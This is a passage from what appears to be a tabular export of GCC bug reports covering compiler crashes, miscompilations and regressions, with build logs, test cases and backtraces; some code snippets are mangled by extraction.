make[2]: Entering directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/libiberty'
make[3]: Entering directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/libiberty/testsuite'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/libiberty/testsuite'
make[2]: Leaving directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/libiberty'
make[2]: Entering directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/fixincludes'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/64_system/build/gcc-build/build-mips64el-unknown-linux-gnu/fixincludes'
make[2]: Entering directory `/64_system/build/gcc-build/zlib'
true AR_FLAGS=rc CC_FOR_BUILD=gcc CFLAGS=-g -O2 CXXFLAGS=-g -O2 CFLAGS_FOR_BUILD=-g -O2 CFLAGS_FOR_TARGET=-g -O2 -minterlink-mips16 INSTALL=/usr/bin/install -c INSTALL_DATA=/usr/bin/install -c -m 644 INSTALL_PROGRAM=/usr/bin/install -c INSTALL_SCRIPT=/usr/bin/install -c LDFLAGS= LIBCFLAGS=-g -O2 LIBCFLAGS_FOR_TARGET=-g -O2 -minterlink-mips16 MAKE=make MAKEINFO=makeinfo --split-size=5000000 --split-size=5000000  PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/bash EXPECT=expect RUNTEST=runtest RUNTESTFLAGS= exec_prefix=/tools infodir=/tools/share/info libdir=/tools/lib prefix=/tools tooldir=/tools/mips64el-unknown-linux-gnu AR=ar AS=as CC=gcc CXX=g++ LD=/64_system/tools/bin/../lib/gcc/mips64el-unknown-linux-gnu/4.5.1/../../../../mips64el-unknown-linux-gnu/bin/ld LIBCFLAGS=-g -O2 NM=nm PICFLAG= RANLIB=ranlib DESTDIR= DO=all multi-do # make
make[2]: Leaving directory `/64_system/build/gcc-build/zlib'
make[2]: Entering directory `/64_system/build/gcc-build/libcpp'
test -f config.h || (rm -f stamp-h1 &amp;&amp; make stamp-h1)
make[2]: Leaving directory `/64_system/build/gcc-build/libcpp'
make[2]: Entering directory `/64_system/build/gcc-build/libdecnumber'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/64_system/build/gcc-build/libdecnumber'
make[2]: Entering directory `/64_system/build/gcc-build/gcc'
gcc -c  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat   -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.5.1/gcc -I../../gcc-4.5.1/gcc/. -I../../gcc-4.5.1/gcc/../include -I../../gcc-4.5.1/gcc/../libcpp/include -I/64_system/build/gcc-build/gmp -I/64_system/build/gcc-build/./mpfr -I/64_system/build/gcc-4.5.1/mpfr -I/64_system/build/gcc-4.5.1/mpc/src  -I../../gcc-4.5.1/gcc/../libdecnumber -I../../gcc-4.5.1/gcc/../libdecnumber/dpd -I../libdecnumber     ../../gcc-4.5.1/gcc/lto-streamer-in.c -o lto-streamer-in.o
gcc: Internal error: Bus error (program cc1)
Please submit a full bug report.
See  for instructions.
make[2]: *** [lto-streamer-in.o] Error 1
make[2]: Leaving directory `/64_system/build/gcc-build/gcc'
make[1]: *** [all-gcc] Error 2
make[1]: Leaving directory `/64_system/build/gcc-build'
make: *** [all] Error 2
   who can offer me some idea to resolv the problem ?
   Thanks at advance.
wen</t>
  </si>
  <si>
    <t>wenheping2000</t>
  </si>
  <si>
    <t>GCC-18888</t>
  </si>
  <si>
    <t>[4.0 regression] loops miscompiled</t>
  </si>
  <si>
    <t>$ gcc-4.0 -O2 -std=gnu99 vfprintf.i  
$ ./a.out  
(null)  
$ gcc-3.4 -O2 -std=gnu99 vfprintf.i  
$ ./a.out  
asdf  
The problem is that string = (char *) __builtin_va_arg(apconst char *) is 
compiled into this: 
	.mmi 
	adds r34 = 8 r34 
	ld8 r37 = [r34] 
ie. preincrement instead of postincrement.</t>
  </si>
  <si>
    <t>GCC-8468</t>
  </si>
  <si>
    <t>Segmentation Fault during compilation immediatly after preprocessing</t>
  </si>
  <si>
    <t>The problem occurs while compiling certain files.  Compilation fails consistantly on valid C++ source code.  However compilation is successful when first compiling with --save-temps and then compiling the .ii file to object dode.  Since there is for the most part no preprocessing of of the ii source file the compilation is successful.
/usr/bin/g++ -I/usr/X11R6/include -I. -I../../../../../lib/database/include -I../../../../../lib/interaction/include -I../../../../../lib/nodekits/include -I../../../../../libSoXt/include -fPIC -DIVPREFIX=\/usr\       -O -DNDEBUG --save-temps -c SoEngines.c++
In file included from SoEngines.c++:57:
SoTriggerAny.c++: In constructor `SoTriggerAny::SoTriggerAny()':
SoTriggerAny.c++:84: internal error: Segmentation fault
g++ -c SoEngines.ii
Maybe this issue has to do with the large source files being included into a single file?
Release:
GCC 3.2 Release
Environment:
Redhat Linux 8.0
GCC 3.2
GNU Make
SGI Open Inventor Source Code
How-To-Repeat:
Download Open Inventor Source code from ftp://oss.sgi.com/projects/inventor/download
Extract files
cd inventor/lib/database/src/so/engines
gmake SoEngines.o</t>
  </si>
  <si>
    <t>GCC-37835</t>
  </si>
  <si>
    <t>-fno-automatic does not work for derived types with default initalizer</t>
  </si>
  <si>
    <t>The following program prints
- 2 42 with gfortran -fno-automatic
- 2 2 with NAG f95 -save and ifort -save
Expected: The SAVE is also implied for derived types with default initializer.
The problem is really the initializer as the dump shows:
  static struct t myt = {.i=42}   &lt;&lt;&lt;&lt;&lt;&lt;&lt; OK since SAVE
  {
    struct t t.1
    t.1.i = 42         &lt;&lt;&lt;&lt;&lt;&lt; OK if not SAVE
    myt = t.1
  }
subroutine foo(n)
  integer :: n
  type t
    integer :: i = 42
  end type t
  type(t) :: myt
  if(n==1) myt%i = 2
  print * myt%i
end subroutine foo
call foo(1)
call foo(2)
end</t>
  </si>
  <si>
    <t>GCC-20124</t>
  </si>
  <si>
    <t>gfortran prints -.01 incorrectly</t>
  </si>
  <si>
    <t>Actually + and - .01 print as zero -
[dir:~/tests/gfortran] dir% gfortran -o print01 print01.f
[dir:~/tests/gfortran] dir% print01
      0.00      0.00
STOP 0
[dir:~/tests/gfortran] dir% cat print01.f
      program main
      x=-.01
      y=.01
      write(61000)xy
      stop
 1000 format (2f10.2)
      end</t>
  </si>
  <si>
    <t>GCC-52942</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] using std::ref with a std::unordered_map fails to compile</t>
  </si>
  <si>
    <t>The following C++ I believe to be valid C++1  but produces error messages (At bottom).
$g++ -std=c++11 -c foo.cc
#include 
#include 
#include 
struct TFoo {}
namespace std {
  template 
  struct hash {
    size_t operator()(const TFoo &amp;) const {
      return 0
    }
  }
}
void f1(std::unordered_map &amp;) {}
void f2() {
  std::unordered_map map1
  std::bind(f1 std::ref(map1))
}
In file included from /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:50:0
                 from foo.cc:1:
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional: In instantiation of 'constexpr const bool std::__has_argument_type_helper &gt;::value':
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:305:1:   required from 'struct std::__has_argument_type &gt;'
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:316:12:   required from 'struct std::_Reference_wrapper_base &gt;'
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:432:11:   required from 'class std::reference_wrapper &gt;'
foo.cc:22:30:   required from here
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/bits/stl_function.h:105:21: error: 'typedef struct std::pair std::unary_function const TFoo&gt;::argument_type' is inaccessible
In file included from foo.cc:1:0:
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:305:3: error: within this context
In file included from /usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:50:0
                 from foo.cc:1:
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional: In instantiation of 'struct std::_Reference_wrapper_base_impl &gt;':
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:316:12:   required from 'struct std::_Reference_wrapper_base &gt;'
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:432:11:   required from 'class std::reference_wrapper &gt;'
foo.cc:22:30:   required from here
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/bits/stl_function.h:105:21: error: 'typedef struct std::pair std::unary_function const TFoo&gt;::argument_type' is inaccessible
In file included from foo.cc:1:0:
/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/functional:283:43: error: within this context</t>
  </si>
  <si>
    <t>GCC-58096</t>
  </si>
  <si>
    <t>[4.9 Regression] gcc.dg/tree-ssa/attr-alias.c fails with r201439</t>
  </si>
  <si>
    <t xml:space="preserve">Subject testcase started failing with r201439.
PASS: gcc.dg/tree-ssa/attr-alias.c (test for excess errors)
PASS: gcc.dg/tree-ssa/attr-alias.c scan-tree-dump-times optimized   test  1
FAIL: gcc.dg/tree-ssa/attr-alias.c scan-tree-dump-times optimized   test4  1
PASS: gcc.dg/tree-ssa/attr-alias.c scan-tree-dump-not optimized   test1 
PASS: gcc.dg/tree-ssa/attr-alias.c scan-tree-dump-not optimized   test2 </t>
  </si>
  <si>
    <t>GCC-63736</t>
  </si>
  <si>
    <t>gcc generated program with segfault on atomic exchange when the atomic variable is a member of a struct allocated with make_shared</t>
  </si>
  <si>
    <t>Created attachment 33882
self contained program which reproduces the problem
I am sending a sample code with a self contained program which declares a struct called PStruct which contains a variable member which is an atomic of a simple struct.
G++ compiles the code correctly however it has a segmentation fault in a (IMO) valid atomic exchance operation when PStruct is allocated using make_shared but it does not happen when it's allocated using new operator.
In clang 3.5 the code generate a valid program which runs as expected.
G++ info:
Using built-in specs.
COLLECT_GCC=g++-4.8
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.1-2ubuntu1~12.04' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.1 (Ubuntu 4.8.1-2ubuntu1~12.04)
The command line I am using to compile the code:
$ g++-4.8 -std=c++11 -Wall -Wextra atomic_of_struct_test.cpp -o atomic_of_struct_test -lrt -latomic
The attached file reproduces the problem because allocates using make_shared. To allocate using new operator comment line 34 and uncomment line 37.
The expected output in both allocation ways is:
field1: 2 field2: 4
The actual output when compiled with g++ is:
Segmentation fault (core dumped)
The backtrace of the later execution:
#0  0x00007ffff7bd5897 in ?? () from /usr/lib/x86_64-linux-gnu/libatomic.so.1
No symbol table info available.
#1  0x0000000000401186 in std::atomic::exchange (this=0x604028 __i=... _m=std::memory_order_seq_cst) at /usr/include/c++/4.8/atomic:225
        tmp = {
          field1 = 140737488346624 
          field2 = 4198920
        }
#2  0x00000000004010e3 in PStruct::setMs (this=0x604028 ms=...) at atomic_of_struct_test.cpp:18
No locals.
#3  0x0000000000400f81 in main () at atomic_of_struct_test.cpp:39
        ms = {
          field1 = 2 
          field2 = 4
        }
        ptr = std::shared_ptr (count 1 weak 0) 0x604028
        oms = {
          field1 = 0 
          field2 = 4197680
        }</t>
  </si>
  <si>
    <t>leandrosansilva</t>
  </si>
  <si>
    <t>GCC-17160</t>
  </si>
  <si>
    <t>Assert_Failure einfo.adb:1359</t>
  </si>
  <si>
    <t>$ gcc -v
Reading specs from
/home/bjorn/ada/gcc-3.4.0-inst/lib/gcc/i686-pc-linux-gnu/3.4.0/specs
Configured with: /home/bjorn/ada/gcc-3.4.0/configure
--prefix=/home/bjorn/ada/gcc-3.4.0-inst
Thread model: posix
gcc version 3.4.0
$ gcc -c -I./ -I-
/home/bjorn/hemmaprogrammerat/adacl/Include/adacl-character_encodings.adb
+===========================GNAT BUG DETECTED==============================+
| 3.4.0 (i686-pc-linux-gnu) Assert_Failure einfo.adb:1359                  |
| Error detected at adacl-character_encodings.adb:61:14                    |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>GCC-43872</t>
  </si>
  <si>
    <t>VLAs are not aligned correctly on ARM</t>
  </si>
  <si>
    <t>This test case is derived from gcc.c-torture/execute/920929-1.c. It creates a VLA of doubles and fills it with zeros:
&gt; cat bad-vla-align.c
unsigned long mask = sizeof(double) - 1
unsigned int __attribute__((noinline)) f(int n)
{
    double v[n]
    while (n &gt; 0)
        v[--n] = 0
    return (unsigned long)v 
}
int main(void)
{
    if (f(100) != 0)
        __builtin_abort()
    return 0
}
With -march=armv5te -O2 gcc uses STRD instructions to write 8 bytes at a time. STRD requires an 8-byte aligned address but gcc fails to align the VLA to 8 bytes resulting in misaligned accesses at runtime. Depending on hardware and kernel configuration this may result in abnormal termination or slow but correct execution. On my Marvell Kirkwood machine it results in EXTREMELY slow execution due to the high overhead of kernel fixups for alignment traps.
The reason for the misalignment can be seen in the assembly code:
&gt; cat bad-vla-align.s
        .arch armv5te
...
f:
        @ args = 0 pretend = 0 frame = 0
        @ frame_needed = 1 uses_anonymous_args = 0
        @ link register save eliminated.
        str     fp [sp #-4]!
sp is 8-byte aligned on entry but not after the prologue.
        mov     r1 r0 asl #3
        add     r3 r1 #8
Both these offsets are multiples of 8.
        add     fp sp #0
        cmp     r0 #0
        sub     sp sp r3
Now sp == &amp;v[0] is not 8-byte aligned.
        mov     ip sp
        ble     .L2
        add     r1 sp r1
r1 == &amp;v[n] is not 8-byte aligned.
        mov     r2 #0
        mov     r3 #0
.L3:
        subs    r0 r0 #1
        strd    r2 [r1 #-8]!
r1 == &amp;v[--n] is not 8-byte aligned so strd fails.
...
I can reproduce this failure with 4.6.0 (r158675) and the 4.5.0 and 4.4.3 releases. 4.3.4 and 4.2.4 appear to work but I don't know if that is by design or by accident (different register allocation resulting in different frame layouts and prologues).
A version of the test case tried to perform the alignment check inside the f function but gcc optimized it away completely apparently knowing that the array address was a multiple of 8. Still another version tried to pass the array address to a separate checking function but that changed f's prologue enough to mask the error.</t>
  </si>
  <si>
    <t>GCC-44213</t>
  </si>
  <si>
    <t>ICE when extending abstract type</t>
  </si>
  <si>
    <t>module ice_module
  type :: a_type
  end type a_type
  typeextends(a_type)abstract :: b_type
  end type b_type
  typeextends(b_type) :: c_type
  end type c_type
end module ice_module
f951: interner Compiler-Fehler: in ensure_not_abstract bei fortran/resolve.c:10559</t>
  </si>
  <si>
    <t>GCC-48073</t>
  </si>
  <si>
    <t>ICE with -flto in templated C++ code</t>
  </si>
  <si>
    <t>The following code produces an ICE if compiled with -flto on g++-4.6.0
SVN revision 170867
$$$&gt; g++ -flto  zombie_coldatoms.cpp
zombie_coldatoms.cpp:48:1: internal compiler error: tree check: did not expect class â€˜typeâ€™ have â€˜typeâ€™ (record_type) in contains_placeholder_p at tree.c:2820
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Replacing the default constructor DDQMC() in line 36 by the automatic default constructor (i.e. removing the corresponding code) makes the code compile.
The problem does not occur with g++-4.5.1</t>
  </si>
  <si>
    <t>tux008</t>
  </si>
  <si>
    <t>GCC-64295</t>
  </si>
  <si>
    <t>[5 Regression] ICE: SIGSEGV (infinite recursion) with -frounding-math -funsafe-math-optimizations</t>
  </si>
  <si>
    <t>Created attachment 34273
reduced testcase
Compiler output:
$ gcc -O -frounding-math -funsafe-math-optimizations testcase.c
gcc: internal compiler error: Segmentation fault (program cc1)
0x40c085 execute
        /mnt/svn/gcc-trunk/gcc/gcc.c:2912
0x40c319 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:4845
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
0x40d317 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5499
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
0x40d317 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5499
0x40c6a3 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5614
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
0x40d317 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5499
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
0x40d317 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5499
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
0x40d317 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5499
0x40e917 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:6128
0x40e917 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:6042
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r218658 - ICE
4_9 r218177 - OK</t>
  </si>
  <si>
    <t>GCC-78035</t>
  </si>
  <si>
    <t>Inconsistency between address comparison and alias analysis</t>
  </si>
  <si>
    <t>Consider
extern int a
extern int b
extern int c
int foo(int choose_a)
{
  int *p
  if (choose_a)
    p = 
  else
    p = 
  return p != 
}
int bar ()
{
  return 
}
where trunk optimizes foo to return 1 while leaving the address comparison
in bar alone.  This is because for bar we end up invoking symtab_node::equal_address_to which considers symbol interposition while
for simplifying foo we look at alias info (points-to) which considers
a b and c distinct objects.
Either we are being too conservative in bar or we have a possible wrong-code
issue in foo considering the very same points-to information is also used
for alias analysis (and obviously direct accesses to a and b are not considered
aliasing either).</t>
  </si>
  <si>
    <t>GCC-11254</t>
  </si>
  <si>
    <t>g++ (3.3): ...Error: Field out of range (optimisation pb)</t>
  </si>
  <si>
    <t>Hi all
Trying to rebuild OpenCascade 4.0 libs onto a GNU/Linux parisc I encounter
following pb:
 g3.3 -DHAVE_CONFIG_H -I. -I/CAD/OpenCascade/src/OCC/OCC/src/TKFillet -I../..
-I/CAD/OpenCascade/src/OCC/OCC/inc -I/CAD/OpenCascade/src/OCC/OCC/drv/ChFiDS
-I/CAD/OpenCascade/src/OCC/OCC/drv/ChFi2d -I/CAD/OpenCascade/src/OCC/OCC/drv/ChFi3d
-I/CAD/OpenCascade/src/OCC/OCC/drv/ChFiKPart
-I/CAD/OpenCascade/src/OCC/OCC/drv/Blend
-I/CAD/OpenCascade/src/OCC/OCC/drv/BRepBlend
-I/CAD/OpenCascade/src/OCC/OCC/drv/BlendFunc
-I/CAD/OpenCascade/src/OCC/OCC/drv/BRepFilletAPI
-I/CAD/OpenCascade/src/OCC/OCC/drv/FilletSurf
-g -O2 -DCSFDB -MT ChFi3d_Builder_CnCrn.lo -MD -MP -MF
.deps/ChFi3d_Builder_CnCrn.Tpo
-c /CAD/OpenCascade/src/OCC/OCC/src/ChFi3d/ChFi3d_Builder_CnCrn.cxx  -fPIC
-DPIC -o .libs/ChFi3d_Builder_CnCrn.o
/tmp/ccQuyyIf.s: Assembler messages:
/tmp/ccQuyyIf.s:146240: Error: Field out of range [-262144..262143] (-290528).
make[3]: *** [ChFi3d_Builder_CnCrn.lo] Error 1
make[3]: Leaving directory `/CAD/OpenCascade/build-40/src/TKFillet'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/CAD/OpenCascade/build-40/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/CAD/OpenCascade/build-40'
make: *** [all] Error 2
Following discussion with Dave:
I so fill in this PR.
This occures with:
palx2000:/CAD/OpenCascade/build-40# dpkg -l g3.3
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (StatusErr: uppercase=bad)
||/ Name                    Version                 Description
=======================-=======================-==============================================================
ii  g3.3                 3.3-3                   The GNU C compiler
# g++ -v
Reading specs from /usr/lib/gcc-lib/hppa-linux/3.3/specs
Configured with: ../src/configure -v
--enable-languages=cc++f77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-sjlj-exceptions --enable-clocale=gnu --enable-debug --enable-objc-gc
hppa-linux
Thread model: posix
gcc version 3.3 (Debian)
and with binutils 2.13.90.0.18-1.7 as with 2.14.90.0.4-0.1 debian dpkg but also
with my own build ov cvs date 20030618:
# as --version
GNU assembler 2.14.90 20030618
Copyright 2002 Free Software Foundation Inc.
This program is free software you may redistribute it under the terms of
the GNU General Public License.  This program has absolutely no warranty.
This assembler was configured for a target of `hppa-linux'.
This problem is just solved by following compiling options:
no optimisation at all (ie no -O2)
-O1
-fno-default-inline (i suppose that -fno-inline also)
But not by either:
-finline-limit=225000 (doesn't help)
-finline-limit=120000 (doesn't help more)
or equivalent (?)
--param max-inline-insns=[300 ... 50]
-fno-implicit-templates and/or -fno-implicit-inline-templates.
Thanks in advance for help
    Joel
PS: I will try to join my pre-compile file asap</t>
  </si>
  <si>
    <t>GCC-80030</t>
  </si>
  <si>
    <t>[7 Regression] valgrind error in vect_get_slp_defs at tree-vect-slp.c:3360</t>
  </si>
  <si>
    <t>I see following valgrind memory leak starting from r237473:
$ valgrind --leak-check=yes --trace-children=yes ./xgcc -B. /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/vect/slp-45.c -fno-diagnostics-show-caret -fdiagnostics-color=never -msse2 -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -O3 -S -o slp-45.s
...
==21623== 272 bytes in 11 blocks are definitely lost in loss record 904 of 1085
==21623==    at 0x4C2B0AF: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==21623==    by 0x1A0588F: xrealloc (xmalloc.c:177)
==21623==    by 0x7F21B2: void va_heap::reserve(vec*&amp; unsigned int bool) (vec.h:288)
==21623==    by 0x7F0F25: vec::reserve(unsigned int bool) (vec.h:1445)
==21623==    by 0x873374: vec::reserve_exact(unsigned int) (vec.h:1465)
==21623==    by 0x9C267C: vec::create(unsigned int) (vec.h:1480)
==21623==    by 0x121FF8B: vect_get_slp_defs(vec _slp_tree* vec va_heap vl_ptr&gt;* int) (tree-vect-slp.c:3360)
==21623==    by 0x11DA086: vect_get_vec_defs(tree_node* tree_node* gimple* vec* vec* _slp_tree* int) (tree-vect-stmts.c:1558)
==21623==    by 0x11E9D1E: vectorizable_store(gimple* gimple_stmt_iterator* gimple** _slp_tree*) (tree-vect-stmts.c:6055)
==21623==    by 0x11F2467: vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*) (tree-vect-stmts.c:8670)
==21623==    by 0x1221094: vect_schedule_slp_instance(_slp_tree* _slp_instance* unsigned int) (tree-vect-slp.c:3703)
==21623==    by 0x12213EC: vect_schedule_slp(vec_info*) (tree-vect-slp.c:3775)
...</t>
  </si>
  <si>
    <t>GCC-8421</t>
  </si>
  <si>
    <t>scm5d6 segfaults when eval.c is compiled with -O2 optimisation</t>
  </si>
  <si>
    <t>The current release of SCM (scm5d6) segfaults
when compiled with -O2 optimisation
The crash is in ceval_1 in eval.c:
(gdb) bt
#0  0x0001b450 in ceval_1 (x=333424) at eval.c:2057
#1  0x0001afa8 in ceval (x=333192 static_env=17780 env=17780) at eval.c:1990
#2  0x00020168 in init_eval () at eval.c:3670
#3  0x00028b30 in init_scm (iverbose=2 buf0stdin=1 init_heap_size=0)
    at scm.c:457
#4  0x00028f1c in scm_init_from_argv (argc=1 argv=0xffbef5ac script_arg=0x0 
    iverbose=2 buf0stdin=1) at scm.c:616
#5  0x000296e8 in main (argc=1 argv=0x1) at scmmain.c:131
Compiling eval.c with -g instead of -O2 gives
a working executable.
NOTE: with the files attached the working executable
will print the message:
SCM version 5d6 Copyright (C) 1990-1999 Free Software Foundation.
SCM comes with ABSOLUTELY NO WARRANTY for details type `(terms)'.
This is free software and you are welcome to redistribute it
under certain conditions type `(terms)' for details.
ERROR: No such file or directory
ERROR: load: Could not open file /home/mward/scm/scm/Init5d6.scm
 in top level environment.
&gt; 
The error messages are expected and the &gt; is scm's prompt.
Release:
gcc version 3.2
Environment:
Sun Microsystems Inc.   SunOS 5.8       Generic February 2000
SunOS charity 5.8 Generic_108528-16 sun4u sparc SUNWUltra-5_10
Configured with: ../gcc-3.2/configure --with-cpu=ultrasparc --disable-nls
Thread model: posix
How-To-Repeat:
gcc -c -O2 -c *.c
gcc -o scmlit.buggy *.o
./scmlit.buggy
(prints a message and segfaults)
SCM version 5d6 Copyright (C) 1990-1999 Free Software Foundation.
SCM comes with ABSOLUTELY NO WARRANTY for details type `(terms)'.
This is free software and you are welcome to redistribute it
under certain conditions type `(terms)' for details.
Segmentation fault (core dumped)
gcc -c -g eval.c
gcc -o scmlit.working *.o
./scmlit.working
(prints this message ending in scm's prompt:)
SCM version 5d6 Copyright (C) 1990-1999 Free Software Foundation.
SCM comes with ABSOLUTELY NO WARRANTY for details type `(terms)'.
This is free software and you are welcome to redistribute it
under certain conditions type `(terms)' for details.
ERROR: No such file or directory
ERROR: load: Could not open file /home/mward/scm/scm/Init5d6.scm
 in top level environment.
&gt; 
The ERROR messages above are expected.</t>
  </si>
  <si>
    <t>martin.ward</t>
  </si>
  <si>
    <t>GCC-83374</t>
  </si>
  <si>
    <t>[DR1813] Bad std::is_standard_layout with two base class subobjects of the same type</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile the following code with gcc 6.3.0 (maybe affects other versions I was not able to check):
#include 
#include 
struct Q {}
struct S : Q {}
struct T : Q {}
struct NonPod : S T {}
int main(int argc char** argv) {
        std::cout ::value &lt;&lt;  
        std::cout ::value &lt;&lt; std::endl
        return 0
}
2. Run the result program.
Expected result:
0 0 (the NonPod structure is not a standard-layout class as described here: http://en.cppreference.com/w/cpp/concept/StandardLayoutType).
Actual result:
1 1</t>
  </si>
  <si>
    <t>alex.mikhalevich</t>
  </si>
  <si>
    <t>GCC-511</t>
  </si>
  <si>
    <t>public enums in class template not accessible via specialized subclass</t>
  </si>
  <si>
    <t>Public enum types of a class template are not accessible in specialized subclasses (hope I got the terminology right sorry otherwise).
Thank you
-Malte
The code in How-To-Repeat produces the following error message:
 g++ -v --save-temps -o boom boom.cpp
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000724 (experimental)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp -lang-c++ -D__GNUG__=2 -v -D__GNUC_
_=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF
__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachi
ne(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ boom.cpp boom.ii
GNU CPP version 2.96 20000724 (experimental) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus boom.ii -quiet -dumpbase boom.cpp -version -o boom.s
GNU C++ version 2.96 20000724 (experimental) (i386-redhat-linux) compiled by GNU C version 2.96 20000724 (experimental).
boom.cpp: In method `void C::choke (A::foo)':
boom.cpp:11: `enum A::foo' is private
boom.cpp:13: within this context
Release:
gcc version 2.96 20000724 (experimental)
Environment:
Distribution: RedHat 6.9.5 (Pinstripe)
glibc: 2.1.92
How-To-Repeat:
# 1 boom.cpp
template 
class A {
public:
